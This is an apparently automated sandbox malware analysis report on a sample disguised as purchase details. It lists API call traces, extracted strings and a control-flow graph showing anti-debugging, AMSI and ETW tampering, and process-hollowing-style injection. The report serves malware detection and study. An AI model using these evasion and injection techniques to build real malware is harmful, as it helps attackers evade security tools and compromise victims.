                                                                                                                                                                                                                          • Opcode ID: 1e3fff73664cdce6c7097bc5c563aeb72e88e0dfc9957bcc874732ce7c1ef189
                                                                                                                                                                                                                          • Instruction ID: 49158d26d9311c15c17309da22fd1708ef641e0c56c2a26098a1afc479a9023a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1e3fff73664cdce6c7097bc5c563aeb72e88e0dfc9957bcc874732ce7c1ef189
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C201A2B4A44304AFEB00EFA4DC41E5EB7FEEB48740F9084E0F40497610DA34A905DA24
                                                                                                                                                                                                                          Function 02B2DBB0 Relevance: 4.5, APIs: 3, Instructions: 47filenativeCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RtlI.N(?,?,00000000,02B2DC7E), ref: 02B2DC2C
                                                                                                                                                                                                                          • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02B2DC7E), ref: 02B2DC42
                                                                                                                                                                                                                          • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02B2DC7E), ref: 02B2DC61
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Path$DeleteFileNameName_
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4284456518-0
                                                                                                                                                                                                                          • Opcode ID: 61a08e4082b907a7fadada8ef99bea835fdc52f3085f566acc936c24da98cff4
                                                                                                                                                                                                                          • Instruction ID: 7e57c1e19183b966585c856fc1901b44e08328d363bdf6be433c6ecf41e8b3b6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 61a08e4082b907a7fadada8ef99bea835fdc52f3085f566acc936c24da98cff4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C01A275A4430A6EEB05DBA08D55FCD77B9AB44304F5005D29204E6081DAB4AB088B24
                                                                                                                                                                                                                          Function 02B2DC04 Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 02B14F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02B14F2E
                                                                                                                                                                                                                          • RtlI.N(?,?,00000000,02B2DC7E), ref: 02B2DC2C
                                                                                                                                                                                                                          • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02B2DC7E), ref: 02B2DC42
                                                                                                                                                                                                                          • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02B2DC7E), ref: 02B2DC61
                                                                                                                                                                                                                            • Part of subcall function 02B14C60: SysFreeString.OLEAUT32(02B2F4A4), ref: 02B14C6E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: PathString$AllocDeleteFileFreeNameName_
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1530111750-0
                                                                                                                                                                                                                          • Opcode ID: 66a4a3a4823cf7049789eae3ca951f846f0146a4fb19272d5dcc8bbded89c83b
                                                                                                                                                                                                                          • Instruction ID: af9d69ab82114b9e8ef285d9bb1cec7df01d799a0ad4891b53d89aa00e2aabc6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 66a4a3a4823cf7049789eae3ca951f846f0146a4fb19272d5dcc8bbded89c83b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A701F47194030DBEEB11EBA0DD56FCDB3BDEB48700F9145E1E605E6590EA74AB088A64
                                                                                                                                                                                                                          Function 02B26DC8 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 02B26D6C: CLSIDFromProgID.OLE32(00000000,?,00000000,02B26DB9,?,?,?,00000000), ref: 02B26D99
                                                                                                                                                                                                                          • CoCreateInstance.OLE32(?,00000000,00000005,02B26EAC,00000000,00000000,02B26E2B,?,00000000,02B26E9B), ref: 02B26E17
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateFromInstanceProg
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2151042543-0
                                                                                                                                                                                                                          • Opcode ID: 65475bca08fe62d4683997fa76f9561573564cbccf2fd98dd4fa29a6a45e5e62
                                                                                                                                                                                                                          • Instruction ID: 65ce6676ed6112fabea7441798b2c83f6ccd0f2f1b98e0c1ec686466d75e23e9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 65475bca08fe62d4683997fa76f9561573564cbccf2fd98dd4fa29a6a45e5e62
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B01F231608708AEF711EF61DC6296FBBBDE749B00B9108B5F409E2690EA309D14C964
                                                                                                                                                                                                                          Function 02B2F7C8 Relevance: 227.8, APIs: 8, Strings: 117, Instructions: 9071COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • InetIsOffline.URL(00000000,00000000,02B3B784,?,?,?,00000000,00000000), ref: 02B2F801
                                                                                                                                                                                                                            • Part of subcall function 02B289D0: FreeLibrary.KERNEL32(742B0000,00000000,00000000,00000000,00000000,02B9738C,Function_0000662C,00000004,02B9739C,02B9738C,05F5E103,00000040,02B973A0,742B0000,00000000,00000000), ref: 02B28AAA
                                                                                                                                                                                                                            • Part of subcall function 02B2F6E8: GetModuleHandleW.KERNEL32(KernelBase,?,02B2FAEB,UacInitialize,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,ScanBuffer,02B97380,02B3B7B8,ScanString,02B97380,02B3B7B8,Initialize), ref: 02B2F6EE
                                                                                                                                                                                                                            • Part of subcall function 02B2F6E8: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02B2F700
                                                                                                                                                                                                                            • Part of subcall function 02B2F744: GetModuleHandleW.KERNEL32(KernelBase), ref: 02B2F754
                                                                                                                                                                                                                            • Part of subcall function 02B2F744: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02B2F766
                                                                                                                                                                                                                            • Part of subcall function 02B2F744: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02B2F77D
                                                                                                                                                                                                                            • Part of subcall function 02B17E5C: GetFileAttributesA.KERNEL32(00000000,?,02B3041F,ScanString,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,ScanString,02B97380,02B3B7B8,UacScan,02B97380,02B3B7B8,UacInitialize), ref: 02B17E67
                                                                                                                                                                                                                            • Part of subcall function 02B1C364: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02C8B8B8,?,02B30751,ScanBuffer,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,ScanBuffer,02B97380,02B3B7B8,OpenSession), ref: 02B1C37B
                                                                                                                                                                                                                            • Part of subcall function 02B2DD70: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B2DE40), ref: 02B2DDAB
                                                                                                                                                                                                                            • Part of subcall function 02B2DD70: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02B2DE40), ref: 02B2DDDB
                                                                                                                                                                                                                            • Part of subcall function 02B2DD70: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02B2DDF0
                                                                                                                                                                                                                            • Part of subcall function 02B2DD70: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02B2DE1C
                                                                                                                                                                                                                            • Part of subcall function 02B2DD70: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02B2DE25
                                                                                                                                                                                                                            • Part of subcall function 02B17E80: GetFileAttributesA.KERNEL32(00000000,?,02B3356F,ScanString,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,ScanBuffer,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,Initialize), ref: 02B17E8B
                                                                                                                                                                                                                            • Part of subcall function 02B18048: CreateDirectoryA.KERNEL32(00000000,00000000,?,02B3370D,OpenSession,02B97380,02B3B7B8,ScanString,02B97380,02B3B7B8,Initialize,02B97380,02B3B7B8,ScanString,02B97380,02B3B7B8), ref: 02B18055
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$Module$AddressAttributesHandleNamePathProc$CheckCloseCreateDebuggerDirectoryFreeInetInformationLibraryName_OfflineOpenPresentQueryReadRemote
                                                                                                                                                                                                                          • String ID: /d $ /o$.url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\esentutl.exe /y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$acS$advapi32$bcrypt$can$dbgcore$endpointdlp$http$ieproxy$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
                                                                                                                                                                                                                          • API String ID: 297057983-2644593349
                                                                                                                                                                                                                          • Opcode ID: a17eed07ffbcc5f27070012b1c678ae930f3691f0b74f4ef17f4a13818689182
                                                                                                                                                                                                                          • Instruction ID: b55d02beae2f92b8f966ebe61073465c5925099330f520550f308a12bacbcafb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a17eed07ffbcc5f27070012b1c678ae930f3691f0b74f4ef17f4a13818689182
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2714E875A0012C9FDB11EB64DD80ACE73BAFF85304FA041E6E549EB218DA30AE95DF51
                                                                                                                                                                                                                          Function 02B38128 Relevance: 162.0, APIs: 5, Strings: 86, Instructions: 2778processthreadCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 4574 2b38128-2b38517 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b148ec 4689 2b393a1-2b39524 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b148ec 4574->4689 4690 2b3851d-2b386f0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b147ec call 2b149a0 call 2b14d74 call 2b14df0 CreateProcessAsUserW 4574->4690 4779 2b39cf5-2b3b2fa call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 * 16 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b27c10 call 2b28338 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 ExitProcess 4689->4779 4780 2b3952a-2b39539 call 2b148ec 4689->4780 4799 2b386f2-2b38769 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 4690->4799 4800 2b3876e-2b38879 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 4690->4800 4780->4779 4788 2b3953f-2b39812 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b2f094 call 2b14860 call 2b149a0 call 2b146d4 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b17e5c 4780->4788 5046 2b39818-2b39aea call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b2e358 call 2b14530 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14de0 * 2 call 2b14764 call 2b2dc8c 4788->5046 5047 2b39aef-2b39cf0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b149f8 call 2b28d70 4788->5047 4799->4800 4900 2b38880-2b38ba0 call 2b149f8 call 2b2de50 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b2d164 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 4800->4900 4901 2b3887b-2b3887e 4800->4901 5217 2b38ba2-2b38bb4 call 2b28730 4900->5217 5218 2b38bb9-2b3939c call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 ResumeThread call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 CloseHandle call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b28080 call 2b2894c * 6 CloseHandle call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 4900->5218 4901->4900 5046->5047 5047->4779 5217->5218 5218->4689
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 02B289D0: FreeLibrary.KERNEL32(742B0000,00000000,00000000,00000000,00000000,02B9738C,Function_0000662C,00000004,02B9739C,02B9738C,05F5E103,00000040,02B973A0,742B0000,00000000,00000000), ref: 02B28AAA
                                                                                                                                                                                                                          • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02C8B7E0,02C8B824,OpenSession,02B97380,02B3B7B8,UacScan,02B97380), ref: 02B386E9
                                                                                                                                                                                                                          • ResumeThread.KERNEL32(00000000,ScanBuffer,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,UacScan,02B97380,02B3B7B8,ScanBuffer,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8), ref: 02B38D33
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,ScanBuffer,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,UacScan,02B97380,02B3B7B8,00000000,ScanBuffer,02B97380,02B3B7B8,OpenSession,02B97380), ref: 02B38EB2
                                                                                                                                                                                                                            • Part of subcall function 02B2894C: LoadLibraryW.KERNEL32(bcrypt,?,00000920,00000000,02B973A8,02B2A587,ScanString,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,Initialize,02B973A8,02B2A93C,UacScan), ref: 02B28960
                                                                                                                                                                                                                            • Part of subcall function 02B2894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B2897A
                                                                                                                                                                                                                            • Part of subcall function 02B2894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000920,00000000,02B973A8,02B2A587,ScanString,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,Initialize), ref: 02B289B6
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,02B97380,02B3B7B8,UacInitialize,02B97380,02B3B7B8,ScanBuffer,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,UacScan,02B97380), ref: 02B392A4
